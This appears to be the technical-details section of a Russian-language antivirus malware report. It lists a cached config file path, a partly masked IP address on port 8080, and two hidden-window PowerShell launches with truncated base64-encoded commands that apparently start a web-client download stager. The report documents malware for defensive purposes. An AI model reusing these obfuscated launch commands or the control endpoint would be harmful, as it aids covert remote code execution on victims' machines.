Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -NonI -W Hidden -Enc JABXAEMAPQBOAEUAVwAtAE8AQgBqAGUAYwBUACAAUwB5AHMAdABFAG0ALgBOAEUAVAAuAFcARQBiAEMAbABpAEUATgB0ADsAJAB1AD0AJwBNAG8AegBpAGwAbABhAC8ANQAuADAAIAAoAFcAaQBuAGQAbwB3AHMAIABOAFQ...
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\dyps348i\config14[1].txt
- '14.##4.144.66':8080
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -NonI -W Hidden -Enc JABXAEMAPQBOAEUAVwAtAE8AQgBqAGUAYwBUACAAUwB5AHMAdABFAG0ALgBOAEUAVAAuAFcARQBiAEMAbABpAEUATgB0ADsAJAB1AD0AJwBNAG8AegBpAGwAbABhAC8ANQAuADAAIAAoAFcAaQBuAGQAbwB3AHMAIABOAFQ... (со скрытым окном)